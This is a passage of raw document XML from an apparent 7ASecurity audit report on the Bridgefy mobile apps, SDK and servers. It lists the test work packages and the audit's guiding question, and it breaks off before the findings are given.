        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>frequent app reinstallations) and 7ASecurity received 5 different build versions and multiple code changes during the test window. These impressions are in line with Bridgefy user comments on the Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> and iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> stores. Future engagements should focus on stable builds and code freezes for best results.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>split</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>items</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>work</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>packages,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>are referenced in the ticket headlines as applicable:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Whitebox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WP2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Whitebox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SDK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WP3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Whitebox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>App</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WP4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Whitebox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cloud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Infrastructure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WP5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>General</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Documentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Consulting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WP6:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Privacy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apps,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Servers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attempt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>answer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>question:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="363" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q1: Do the Android &amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>contain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>flaws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>might</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:after="30"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>findings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(WP1-5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>summarized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
